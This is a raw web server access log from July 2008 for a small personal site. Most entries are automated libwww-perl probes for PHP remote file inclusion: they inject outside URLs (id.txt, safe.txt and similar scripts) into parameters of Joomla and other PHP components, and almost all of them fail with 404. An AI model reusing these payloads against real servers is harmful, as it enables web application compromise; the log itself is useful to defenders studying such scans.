74.6.22.163 - - [29/Jul/2008:01:36:36 -0500] "GET /logs/access_log.1199664000 HTTP/1.0" 200 167907 "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
66.209.91.189 - - [29/Jul/2008:01:37:22 -0500] "GET /logs/?sourcedir=http://www.steelselect.com/resource_library/ips.txt? HTTP/1.1" 200 93161 "-""libwww-perl/5.79"
66.209.91.189 - - [29/Jul/2008:01:37:22 -0500] "GET /?sourcedir=http://www.steelselect.com/resource_library/ips.txt? HTTP/1.1" 200 1243 "-""libwww-perl/5.79"
201.17.3.26 - - [29/Jul/2008:01:42:39 -0500] "GET /logs/access_log.1214438400//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 404 348 "-""libwww-perl/5.79"
201.17.3.26 - - [29/Jul/2008:01:42:41 -0500] "GET //ktmllite/includes/ktedit/toolbar.php?dirDepth=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 404 321 "-""libwww-perl/5.79"
201.17.3.26 - - [29/Jul/2008:01:42:43 -0500] "GET /logs//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 404 326 "-""libwww-perl/5.79"
58.65.228.5 - - [29/Jul/2008:01:42:59 -0500] "GET /logs//Neos_Chronos/header.php?base_folder=http://www.metal-headz.co.uk/modules/coppermine/include/.../.../.../.../.../.../idsc3.txt??? HTTP/1.1" 404 313 "-""libwww-perl/5.79"
58.65.228.5 - - [29/Jul/2008:01:43:03 -0500] "GET //Neos_Chronos/header.php?base_folder=http://www.metal-headz.co.uk/modules/coppermine/include/.../.../.../.../.../.../idsc3.txt??? HTTP/1.1" 404 308 "-""libwww-perl/5.79"
67.192.77.37 - - [29/Jul/2008:01:44:55 -0500] "GET /logs//hioxBannerRotate.php?hm=http://www.doxgroup.com/egroupware/did.txt?? HTTP/1.1" 404 310 "-""libwww-perl/5.805"
67.192.77.37 - - [29/Jul/2008:01:44:55 -0500] "GET //hioxBannerRotate.php?hm=http://www.doxgroup.com/egroupware/did.txt?? HTTP/1.1" 404 305 "-""libwww-perl/5.805"
81.19.69.161 - - [29/Jul/2008:01:45:03 -0500] "GET /logs/errors.php?error=http://gaara99.t35.com/id.txt?? HTTP/1.1" 404 299 "-""libwww-perl/5.805"
81.19.69.161 - - [29/Jul/2008:01:45:04 -0500] "GET /errors.php?error=http://gaara99.t35.com/id.txt?? HTTP/1.1" 404 294 "-""libwww-perl/5.805"
80.67.25.19 - - [29/Jul/2008:01:47:00 -0500] "GET /logs/access_log.1214438400//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.rosomz.ru/v/licence.txt?? HTTP/1.1" 404 347 "-""libwww-perl/5.808"
80.67.25.19 - - [29/Jul/2008:01:47:00 -0500] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://www.rosomz.ru/v/licence.txt?? HTTP/1.1" 404 320 "-""libwww-perl/5.808"
80.67.25.19 - - [29/Jul/2008:01:47:01 -0500] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.rosomz.ru/v/licence.txt?? HTTP/1.1" 404 325 "-""libwww-perl/5.808"
74.6.18.231 - - [29/Jul/2008:01:47:44 -0500] "GET /robots.txt HTTP/1.0" 404 282 "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
74.6.18.231 - - [29/Jul/2008:01:47:45 -0500] "GET /logs/access_log.1196985600 HTTP/1.0" 200 98953 "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
80.67.25.19 - - [29/Jul/2008:01:49:01 -0500] "GET /logs/access_log.1212883200//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.rosomz.ru/v/licence.txt?? HTTP/1.1" 404 347 "-""libwww-perl/5.808"
207.45.177.194 - - [29/Jul/2008:01:49:46 -0500] "GET /logs//hioxBannerRotate.php?hm=add%20this? HTTP/1.1" 404 310 "-""libwww-perl/5.812"
207.45.177.194 - - [29/Jul/2008:01:49:47 -0500] "GET //hioxBannerRotate.php?hm=add%20this? HTTP/1.1" 404 305 "-""libwww-perl/5.812"
80.67.25.19 - - [29/Jul/2008:01:50:53 -0500] "GET /logs/access_log.1213142400//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.rosomz.ru/v/licence.txt?? HTTP/1.1" 404 347 "-""libwww-perl/5.808"
74.6.18.231 - - [29/Jul/2008:01:51:14 -0500] "GET /logs/access_log.1216425600 HTTP/1.0" 200 754826 "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
80.67.25.19 - - [29/Jul/2008:01:51:23 -0500] "GET /logs/access_log.1213315200//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.rosomz.ru/v/licence.txt?? HTTP/1.1" 404 347 "-""libwww-perl/5.808"
207.45.177.194 - - [29/Jul/2008:01:51:39 -0500] "GET /logs//hioxBannerRotate.php?hm=http://artworkmarket.com/administrator/components/safe.txt? HTTP/1.1" 404 310 "-""libwww-perl/5.812"
207.45.177.194 - - [29/Jul/2008:01:51:39 -0500] "GET //hioxBannerRotate.php?hm=http://artworkmarket.com/administrator/components/safe.txt? HTTP/1.1" 404 305 "-""libwww-perl/5.812"
216.14.123.10 - - [29/Jul/2008:01:51:51 -0500] "GET /logs//hioxBannerRotate.php?hm=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 310 "-""libwww-perl/5.65"
216.14.123.10 - - [29/Jul/2008:01:51:51 -0500] "GET //hioxBannerRotate.php?hm=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 305 "-""libwww-perl/5.65"
201.17.3.26 - - [29/Jul/2008:01:52:29 -0500] "GET /logs/access_log.1214438400//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 404 348 "-""libwww-perl/5.79"
201.17.3.26 - - [29/Jul/2008:01:52:29 -0500] "GET //ktmllite/includes/ktedit/toolbar.php?dirDepth=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 404 321 "-""libwww-perl/5.79"
201.17.3.26 - - [29/Jul/2008:01:52:29 -0500] "GET /logs//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 404 326 "-""libwww-perl/5.79"
74.6.18.231 - - [29/Jul/2008:01:54:02 -0500] "GET /logs/access_log.1209427200 HTTP/1.0" 200 247343 "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
217.110.54.240 - - [29/Jul/2008:01:54:50 -0500] "GET /logs/errors.php?error=http://gaara99.t35.com/id.txt?? HTTP/1.1" 404 299 "-""libwww-perl/5.803"
217.110.54.240 - - [29/Jul/2008:01:54:50 -0500] "GET /errors.php?error=http://gaara99.t35.com/id.txt?? HTTP/1.1" 404 294 "-""libwww-perl/5.803"
201.130.79.130 - - [29/Jul/2008:01:56:43 -0500] "GET /logs/access_log.1213142400//phpsecurityadmin/include/logout.php?PSA_PATH=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 347 "-""libwww-perl/5.803"
201.130.79.130 - - [29/Jul/2008:01:56:44 -0500] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 320 "-""libwww-perl/5.803"
201.130.79.130 - - [29/Jul/2008:01:56:44 -0500] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 325 "-""libwww-perl/5.803"
216.81.239.15 - - [29/Jul/2008:01:58:07 -0500] "GET /logs/modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.thecornerstone.net/calendar/languages/id.txt??? HTTP/1.1" 404 337 "-""libwww-perl/5.805"
216.81.239.15 - - [29/Jul/2008:01:58:07 -0500] "GET /modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.thecornerstone.net/calendar/languages/id.txt??? HTTP/1.1" 404 332 "-""libwww-perl/5.805"
70.84.182.98 - - [29/Jul/2008:02:00:13 -0500] "GET /logs/access_log.1213142400//phpsecurityadmin/include/logout.php?PSA_PATH=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 347 "-""libwww-perl/5.810"
70.84.182.98 - - [29/Jul/2008:02:00:14 -0500] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 320 "-""libwww-perl/5.810"
70.84.182.98 - - [29/Jul/2008:02:00:14 -0500] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 325 "-""libwww-perl/5.810"
74.53.240.146 - - [29/Jul/2008:02:02:58 -0500] "GET //ktmlpro100/includes/ktedit/toolbar.php?dirDepth=http://www.atventure.de/images/id.txt??? HTTP/1.1" 404 323 "-""libwww-perl/5.79"
74.53.240.146 - - [29/Jul/2008:02:02:58 -0500] "GET /logs//ktmlpro100/includes/ktedit/toolbar.php?dirDepth=http://www.atventure.de/images/id.txt??? HTTP/1.1" 404 328 "-""libwww-perl/5.79"
82.215.5.179 - - [29/Jul/2008:02:06:32 -0500] "GET /logs/authenticate.php?default_path_for_themes=http://www.icamotorediciones.es/administrator/popups/id.txt? HTTP/1.1" 404 305 "-""libwww-perl/5.79"
82.215.5.179 - - [29/Jul/2008:02:06:33 -0500] "GET /authenticate.php?default_path_for_themes=http://www.icamotorediciones.es/administrator/popups/id.txt? HTTP/1.1" 404 300 "-""libwww-perl/5.79"
205.234.243.181 - - [29/Jul/2008:02:08:20 -0500] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.dalycityrecords.com/ids.txt?? HTTP/1.1" 404 347 "-""libwww-perl/5.810"
205.234.243.181 - - [29/Jul/2008:02:08:20 -0500] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.dalycityrecords.com/ids.txt?? HTTP/1.1" 404 342 "-""libwww-perl/5.810"
195.46.41.89 - - [29/Jul/2008:02:09:30 -0500] "GET /logs/access_log.1178755200 HTTP/1.1" 200 178180 "-""Mozilla/4.61 [en] (X11; U; SunOS 5.6 sun4u)"
87.106.191.163 - - [29/Jul/2008:02:09:35 -0500] "GET /logs//atom.php5?page=http://susanita.de/tests/test?? HTTP/1.1" 404 299 "-""libwww-perl/5.805"
87.106.191.163 - - [29/Jul/2008:02:09:35 -0500] "GET //atom.php5?page=http://susanita.de/tests/test?? HTTP/1.1" 404 294 "-""libwww-perl/5.805"
160.99.12.231 - - [29/Jul/2008:02:12:22 -0500] "GET /logs//include/write.php?dir=http://genthal.com/alba.txt??? HTTP/1.1" 404 307 "-""libwww-perl/5.65"
160.99.12.231 - - [29/Jul/2008:02:12:23 -0500] "GET //include/write.php?dir=http://genthal.com/alba.txt??? HTTP/1.1" 404 302 "-""libwww-perl/5.65"
89.111.179.12 - - [29/Jul/2008:02:14:31 -0500] "GET /logs//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.phanom.ac.th/msnlist/id.txt??? HTTP/1.1" 404 348 "-""libwww-perl/5.805"
89.111.179.12 - - [29/Jul/2008:02:14:32 -0500] "GET //program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.phanom.ac.th/msnlist/id.txt??? HTTP/1.1" 404 343 "-""libwww-perl/5.805"
64.119.177.12 - - [29/Jul/2008:02:14:44 -0500] "GET /logs//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.phanom.ac.th/msnlist/id.txt??? HTTP/1.1" 404 348 "-""libwww-perl/5.79"
64.119.177.12 - - [29/Jul/2008:02:14:44 -0500] "GET //program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.phanom.ac.th/msnlist/id.txt??? HTTP/1.1" 404 343 "-""libwww-perl/5.79"
216.81.239.15 - - [29/Jul/2008:02:16:20 -0500] "GET /logs//home/vetech/public_html/mambots/editors/htmlarea3_xtd/popups/InsertFile/config.inc.php?=http://www.thecornerstone.net/calendar/languages/id.txt??? HTTP/1.1" 404 376 "-""libwww-perl/5.805"
216.81.239.15 - - [29/Jul/2008:02:16:20 -0500] "GET //home/vetech/public_html/mambots/editors/htmlarea3_xtd/popups/InsertFile/config.inc.php?=http://www.thecornerstone.net/calendar/languages/id.txt??? HTTP/1.1" 404 371 "-""libwww-perl/5.805"
207.213.245.1 - - [29/Jul/2008:02:16:21 -0500] "GET /logs//include/write.php?dir=http://inside-asia.com//templates/safe.txt?? HTTP/1.1" 404 307 "-""libwww-perl/5.65"
207.213.245.1 - - [29/Jul/2008:02:16:22 -0500] "GET //include/write.php?dir=http://inside-asia.com//templates/safe.txt?? HTTP/1.1" 404 302 "-""libwww-perl/5.65"
207.213.245.215 - - [29/Jul/2008:02:16:28 -0500] "GET /logs//include/write.php?dir=http://server.classyhost.com/~pictures/safe.txt?? HTTP/1.1" 404 307 "-""libwww-perl/5.65"
207.213.245.215 - - [29/Jul/2008:02:16:28 -0500] "GET //include/write.php?dir=http://server.classyhost.com/~pictures/safe.txt?? HTTP/1.1" 404 302 "-""libwww-perl/5.65"
72.232.189.170 - - [29/Jul/2008:02:17:58 -0500] "GET /logs/index.php?MODULE_FOLDER=http://www.rfpoa.com/Forum/image.php?u=36977 HTTP/1.1" 404 298 "-""libwww-perl/5.812"
72.232.189.170 - - [29/Jul/2008:02:17:58 -0500] "GET /index.php?MODULE_FOLDER=http://www.rfpoa.com/Forum/image.php?u=36977 HTTP/1.1" 404 293 "-""libwww-perl/5.812"
209.91.252.196 - - [29/Jul/2008:02:18:16 -0500] "GET /logs/access_log.1213142400//phpsecurityadmin/include/logout.php?PSA_PATH=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 347 "-""libwww-perl/5.805"
209.91.252.196 - - [29/Jul/2008:02:18:16 -0500] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 320 "-""libwww-perl/5.805"
209.91.252.196 - - [29/Jul/2008:02:18:17 -0500] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 325 "-""libwww-perl/5.805"
194.201.253.2 - - [29/Jul/2008:02:19:24 -0500] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 325 "-""libwww-perl/5.810"
194.201.253.2 - - [29/Jul/2008:02:19:27 -0500] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 320 "-""libwww-perl/5.810"
160.99.12.231 - - [29/Jul/2008:02:19:29 -0500] "GET /logs//atom.php5?page=http://genthal.com/alba.txt??? HTTP/1.1" 404 299 "-""libwww-perl/5.65"
160.99.12.231 - - [29/Jul/2008:02:19:30 -0500] "GET //atom.php5?page=http://genthal.com/alba.txt??? HTTP/1.1" 404 294 "-""libwww-perl/5.65"
194.201.253.2 - - [29/Jul/2008:02:19:33 -0500] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 325 "-""libwww-perl/5.810"
194.201.253.2 - - [29/Jul/2008:02:19:36 -0500] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 320 "-""libwww-perl/5.810"
209.97.201.148 - - [29/Jul/2008:02:20:53 -0500] "GET /errors.php?error=http://www.doxgroup.com/egroupware/did.txt?? HTTP/1.1" 404 294 "-""libwww-perl/5.79"
209.97.201.148 - - [29/Jul/2008:02:20:53 -0500] "GET /logs/errors.php?error=http://www.doxgroup.com/egroupware/did.txt?? HTTP/1.1" 404 299 "-""libwww-perl/5.79"
74.6.18.231 - - [29/Jul/2008:02:21:12 -0500] "GET /tattoo/links.htm HTTP/1.0" 200 1325 "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
207.213.245.1 - - [29/Jul/2008:02:21:28 -0500] "GET /logs//include/write.php?dir=http://inside-asia.com//templates/safe.txt? HTTP/1.1" 404 307 "-""libwww-perl/5.65"
207.213.245.1 - - [29/Jul/2008:02:21:29 -0500] "GET //include/write.php?dir=http://inside-asia.com//templates/safe.txt? HTTP/1.1" 404 302 "-""libwww-perl/5.65"
207.213.245.215 - - [29/Jul/2008:02:21:51 -0500] "GET /logs//atom.php5?page=http://server.classyhost.com/~pictures/safe.txt?? HTTP/1.1" 404 299 "-""libwww-perl/5.65"
207.213.245.215 - - [29/Jul/2008:02:21:53 -0500] "GET //atom.php5?page=http://server.classyhost.com/~pictures/safe.txt?? HTTP/1.1" 404 294 "-""libwww-perl/5.65"
67.236.179.96 - - [29/Jul/2008:02:23:36 -0500] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.freewebs.com/dopeslave/ID.txt???? HTTP/1.1" 404 347 "-""libwww-perl/5.808"
67.236.179.96 - - [29/Jul/2008:02:23:36 -0500] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.freewebs.com/dopeslave/ID.txt???? HTTP/1.1" 404 342 "-""libwww-perl/5.808"
82.215.5.179 - - [29/Jul/2008:02:24:42 -0500] "GET /logs/////ktmlstandard/includes/ktedit/toolbar.php?dirDepth=http://www.icamotorediciones.es/administrator/includes/pcl/id.txt??? HTTP/1.1" 404 333 "-""libwww-perl/5.79"
82.215.5.179 - - [29/Jul/2008:02:24:43 -0500] "GET /////ktmlstandard/includes/ktedit/toolbar.php?dirDepth=http://www.icamotorediciones.es/administrator/includes/pcl/id.txt??? HTTP/1.1" 404 328 "-""libwww-perl/5.79"
207.213.245.1 - - [29/Jul/2008:02:24:43 -0500] "GET /logs//atom.php5?page=http://inside-asia.com//templates/safe.txt? HTTP/1.1" 404 299 "-""libwww-perl/5.65"
207.213.245.1 - - [29/Jul/2008:02:24:43 -0500] "GET //atom.php5?page=http://inside-asia.com//templates/safe.txt? HTTP/1.1" 404 294 "-""libwww-perl/5.65"
74.6.18.231 - - [29/Jul/2008:02:24:51 -0500] "GET /logs/access_log.1197072000 HTTP/1.0" 200 133968 "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
62.149.205.38 - - [29/Jul/2008:02:25:01 -0500] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://www.caffediperugia.it/id.txt??? HTTP/1.1" 404 318 "-""libwww-perl/5.803"
62.149.205.38 - - [29/Jul/2008:02:25:01 -0500] "GET //modules/vwar/admin/admin.php?vwar_root=http://www.caffediperugia.it/id.txt??? HTTP/1.1" 404 313 "-""libwww-perl/5.803"
74.53.240.146 - - [29/Jul/2008:02:27:19 -0500] "GET /logs//e404.php?DOCUMENT_ROOT=http://www.atventure.de/images/id.txt??? HTTP/1.1" 404 298 "-""libwww-perl/5.79"
74.53.240.146 - - [29/Jul/2008:02:27:19 -0500] "GET //e404.php?DOCUMENT_ROOT=http://www.atventure.de/images/id.txt??? HTTP/1.1" 404 293 "-""libwww-perl/5.79"
207.213.245.1 - - [29/Jul/2008:02:29:10 -0500] "GET /logs//atom.php5?page=http://inside-asia.com//templates/safe.txt?? HTTP/1.1" 404 299 "-""libwww-perl/5.65"
66.249.70.131 - - [29/Jul/2008:02:29:13 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
207.213.245.1 - - [29/Jul/2008:02:29:13 -0500] "GET //atom.php5?page=http://inside-asia.com//templates/safe.txt?? HTTP/1.1" 404 294 "-""libwww-perl/5.65"
84.21.71.133 - - [29/Jul/2008:02:29:16 -0500] "GET /logs//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://bosanskinovi.info/components/com_zoom/lib/id? HTTP/1.1" 404 361 "-""libwww-perl/5.805"
84.21.71.133 - - [29/Jul/2008:02:29:16 -0500] "GET //administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://bosanskinovi.info/components/com_zoom/lib/id? HTTP/1.1" 404 356 "-""libwww-perl/5.805"
66.249.70.131 - - [29/Jul/2008:02:29:20 -0500] "GET /logs/access_log.1212278400 HTTP/1.1" 200 536695 "-""Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.98.216.89 - - [29/Jul/2008:02:30:01 -0500] "GET /logs/errors.php?error=http://arptuning.hu/old/payment/alt/id.txt? HTTP/1.1" 404 299 "-""libwww-perl/5.812"
66.98.216.89 - - [29/Jul/2008:02:30:02 -0500] "GET /errors.php?error=http://arptuning.hu/old/payment/alt/id.txt? HTTP/1.1" 404 294 "-""libwww-perl/5.812"
89.111.179.12 - - [29/Jul/2008:02:32:21 -0500] "GET /logs/errors.php?error=http://www.phanom.ac.th/msnlist/id.txt??? HTTP/1.1" 404 299 "-""libwww-perl/5.805"
89.111.179.12 - - [29/Jul/2008:02:32:21 -0500] "GET /errors.php?error=http://www.phanom.ac.th/msnlist/id.txt??? HTTP/1.1" 404 294 "-""libwww-perl/5.805"
200.11.67.242 - - [29/Jul/2008:02:33:08 -0500] "GET /logs/access_log.1213142400//phpsecurityadmin/include/logout.php?PSA_PATH=http://poko.club.hu/id1.txt??? HTTP/1.1" 404 347 "-""libwww-perl/5.65"
200.11.67.242 - - [29/Jul/2008:02:33:09 -0500] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://poko.club.hu/id1.txt??? HTTP/1.1" 404 320 "-""libwww-perl/5.65"
200.11.67.242 - - [29/Jul/2008:02:33:09 -0500] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://poko.club.hu/id1.txt??? HTTP/1.1" 404 325 "-""libwww-perl/5.65"
66.216.91.89 - - [29/Jul/2008:02:33:31 -0500] "GET /logs/errors.php?error=http://www.phanom.ac.th/msnlist/id.txt??? HTTP/1.1" 404 299 "-""libwww-perl/5.79"
66.216.91.89 - - [29/Jul/2008:02:33:31 -0500] "GET /errors.php?error=http://www.phanom.ac.th/msnlist/id.txt??? HTTP/1.1" 404 294 "-""libwww-perl/5.79"
64.119.177.12 - - [29/Jul/2008:02:35:17 -0500] "GET /logs/errors.php?error=http://www.phanom.ac.th/msnlist/id.txt??? HTTP/1.1" 404 299 "-""libwww-perl/5.79"
64.119.177.12 - - [29/Jul/2008:02:35:18 -0500] "GET /errors.php?error=http://www.phanom.ac.th/msnlist/id.txt??? HTTP/1.1" 404 294 "-""libwww-perl/5.79"
66.216.91.89 - - [29/Jul/2008:02:35:53 -0500] "GET /logs/errors.php?DOCUMENT_ROOT=http://www.phanom.ac.th/msnlist/id.txt??? HTTP/1.1" 404 299 "-""libwww-perl/5.79"
66.216.91.89 - - [29/Jul/2008:02:35:53 -0500] "GET /errors.php?DOCUMENT_ROOT=http://www.phanom.ac.th/msnlist/id.txt??? HTTP/1.1" 404 294 "-""libwww-perl/5.79"
84.21.71.133 - - [29/Jul/2008:02:36:13 -0500] "GET //administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://bosanskinovi.info/components/com_zoom/lib/id? HTTP/1.1" 404 356 "-""libwww-perl/5.805"
64.119.177.12 - - [29/Jul/2008:02:37:08 -0500] "GET /logs/errors.php?DOCUMENT_ROOT=http://www.phanom.ac.th/msnlist/id.txt??? HTTP/1.1" 404 299 "-""libwww-perl/5.79"
64.119.177.12 - - [29/Jul/2008:02:37:08 -0500] "GET /errors.php?DOCUMENT_ROOT=http://www.phanom.ac.th/msnlist/id.txt??? HTTP/1.1" 404 294 "-""libwww-perl/5.79"
89.111.179.12 - - [29/Jul/2008:02:38:22 -0500] "GET /logs/errors.php?DOCUMENT_ROOT=http://www.phanom.ac.th/msnlist/id.txt??? HTTP/1.1" 404 299 "-""libwww-perl/5.805"
89.111.179.12 - - [29/Jul/2008:02:38:22 -0500] "GET /errors.php?DOCUMENT_ROOT=http://www.phanom.ac.th/msnlist/id.txt??? HTTP/1.1" 404 294 "-""libwww-perl/5.805"
89.108.66.182 - - [29/Jul/2008:02:38:54 -0500] "GET //administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://bosanskinovi.info/components/com_zoom/lib/id?? HTTP/1.1" 404 356 "-""libwww-perl/5.812"
213.228.155.43 - - [29/Jul/2008:02:39:02 -0500] "GET /logs/errors.php?DOCUMENT_ROOT=http://www.alight.pe.kr/zboard/latest_skin/id.txt?? HTTP/1.1" 404 299 "-""libwww-perl/5.805"
213.228.155.43 - - [29/Jul/2008:02:39:02 -0500] "GET /errors.php?DOCUMENT_ROOT=http://www.alight.pe.kr/zboard/latest_skin/id.txt?? HTTP/1.1" 404 294 "-""libwww-perl/5.805"
66.225.215.205 - - [29/Jul/2008:02:40:38 -0500] "GET /logs/skin/zero_vote/ask_password.php?dir=http://tsunamibot.t35.com/on.txt?? HTTP/1.1" 404 320 "-""libwww-perl/5.810"
66.225.215.205 - - [29/Jul/2008:02:40:38 -0500] "GET /skin/zero_vote/ask_password.php?dir=http://tsunamibot.t35.com/on.txt?? HTTP/1.1" 404 315 "-""libwww-perl/5.810"
205.234.243.181 - - [29/Jul/2008:02:41:31 -0500] "GET /logs//e404.php?DOCUMENT_ROOT=http://www.horde-hunterz.co.uk/xoops/xoops/safe.txt?? HTTP/1.1" 404 298 "-""libwww-perl/5.810"
205.234.243.181 - - [29/Jul/2008:02:41:31 -0500] "GET //e404.php?DOCUMENT_ROOT=http://www.horde-hunterz.co.uk/xoops/xoops/safe.txt?? HTTP/1.1" 404 293 "-""libwww-perl/5.810"
74.6.18.231 - - [29/Jul/2008:02:42:30 -0500] "GET /logs/access_log.1212883200 HTTP/1.0" 200 303554 "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
195.70.36.107 - - [29/Jul/2008:02:45:01 -0500] "GET /logs//e404.php?DOCUMENT_ROOT=http://www.coronaclub.it/pk_gallery/photos/25/11828333/idilegal.txt??? HTTP/1.1" 404 298 "-""libwww-perl/5.805"
195.70.36.107 - - [29/Jul/2008:02:45:01 -0500] "GET //e404.php?DOCUMENT_ROOT=http://www.coronaclub.it/pk_gallery/photos/25/11828333/idilegal.txt??? HTTP/1.1" 404 293 "-""libwww-perl/5.805"
205.234.200.220 - - [29/Jul/2008:02:46:29 -0500] "GET /logs/errors.php?DOCUMENT_ROOT=http://www.rfpoa.com/Forum/image.php?u=36977 HTTP/1.1" 404 299 "-""libwww-perl/5.810"
205.234.200.220 - - [29/Jul/2008:02:46:30 -0500] "GET /errors.php?DOCUMENT_ROOT=http://www.rfpoa.com/Forum/image.php?u=36977 HTTP/1.1" 404 294 "-""libwww-perl/5.810"
66.225.215.205 - - [29/Jul/2008:02:47:02 -0500] "GET /skin/zero_vote/ask_password.php?dir=http://tsunamibot.t35.com/on.txt?? HTTP/1.1" 404 315 "-""libwww-perl/5.810"
71.71.211.182 - - [29/Jul/2008:02:47:20 -0500] "GET /tattoo/tattoo1.htm HTTP/1.1" 200 3776 "http://en.wikipedia.org/wiki/Flash_%28tattoo%29""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1"
71.71.211.182 - - [29/Jul/2008:02:47:21 -0500] "GET /tattoo/tat_1st.JPG HTTP/1.1" 200 16480 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1"
71.71.211.182 - - [29/Jul/2008:02:48:09 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1"
193.111.11.7 - - [29/Jul/2008:02:48:49 -0500] "GET /logs/errors.php?error=http://gaara99.t35.com/id.txt?? HTTP/1.1" 404 299 "-""libwww-perl/5.805"
193.111.11.7 - - [29/Jul/2008:02:48:50 -0500] "GET /errors.php?error=http://gaara99.t35.com/id.txt?? HTTP/1.1" 404 294 "-""libwww-perl/5.805"
84.21.71.133 - - [29/Jul/2008:02:53:30 -0500] "GET /logs/access_log.1214438400//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://bosanskinovi.info/components/com_zoom/lib/id? HTTP/1.1" 404 383 "-""libwww-perl/5.805"
84.21.71.133 - - [29/Jul/2008:02:53:30 -0500] "GET //administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://bosanskinovi.info/components/com_zoom/lib/id? HTTP/1.1" 404 356 "-""libwww-perl/5.805"
84.21.71.133 - - [29/Jul/2008:02:53:30 -0500] "GET /logs//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://bosanskinovi.info/components/com_zoom/lib/id? HTTP/1.1" 404 361 "-""libwww-perl/5.805"
205.234.198.174 - - [29/Jul/2008:02:54:19 -0500] "GET /skin/zero_vote/ask_password.php?dir=http://tsunamibot.t35.com/on.txt?? HTTP/1.1" 404 315 "-""libwww-perl/5.810"
